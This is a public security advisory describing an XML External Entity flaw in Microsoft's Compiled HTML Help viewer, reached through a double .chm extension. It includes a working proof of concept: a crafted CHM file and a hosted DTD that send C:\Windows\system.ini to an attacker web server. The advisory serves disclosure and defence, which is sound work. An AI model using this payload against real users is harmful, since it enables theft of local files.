Microsoft Compiled HTML Help "hh.exe"
Microsoft Compiled HTML Help is a Microsoft proprietary online help format, consisting of a collection of HTML pages, an index and other navigation tools.
The files are compressed and deployed in a binary format with the extension .CHM, for Compiled HTML. The format is often used for software documentation.
CHM is an extension for the Compiled HTML file format, most commonly used by Microsoft's HTML-based help program.
[Vulnerability Type]
Uncompiled .CHM File XML External Entity Injection
[CVE Reference]
N/A
[Security Issue]
CHM Files are usually created using Microsofts "HTML Help Workshop" program. However, I find a way to bypass using this program and create them easily by
simply adding double .chm extension to the file ".chm.chm". Compiled HTML Help "hh.exe" will then respect and open it processing any JS/HTML/XML inside etc.
Compiled HTML Help is also vulnerable to XML External Entity attacks allowing remote attackers to steal and exfiltrate local system files.
Whats interesting about this one is we can create the file without using the "Microsoft HTML Help Workshop" program. Also, we can steal files without
having to use the "hhtctrl.ocx" ActiveX control CLASSID: 52a2aaae-085d-4187-97ea-8c30db990436 or other code execution methods.
While CHM is already considered a "dangerous" file type and other type of attacks have already been documented. I thought this was an interesting way to
create CHM files "Uncompiled" bypassing the default creation steps while stealing local files in the process.
Note: User interaction is required to exploit this vulnerability.
[Exploit/POC]
1) python -m SimpleHTTPServer
2) "XXE.chm.chm"
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<Title>Uncompiled CHM File XXE PoC</Title>
</HEAD>
<BODY>
<xml>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE tastyexploits [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://localhost:81/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
</xml>
</BODY>
</HTML>
3) "payload.dtd" (hosted in python web-server dir port 81 above)
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:81?%file;'>">
%all;
Open the "XXE.chm.chm" file and will exfil Windows "system.ini", attacker Server IP is set to localhost using port 81 for PoC.
Tested successfully Windows 7/10
[POC Video URL]
https://www.youtube.com/watch?v=iaxp1iBDWXY
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: April 25, 2019
MSRC Response: "We determined that this behavior is considered to be by design"
July 16, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
↧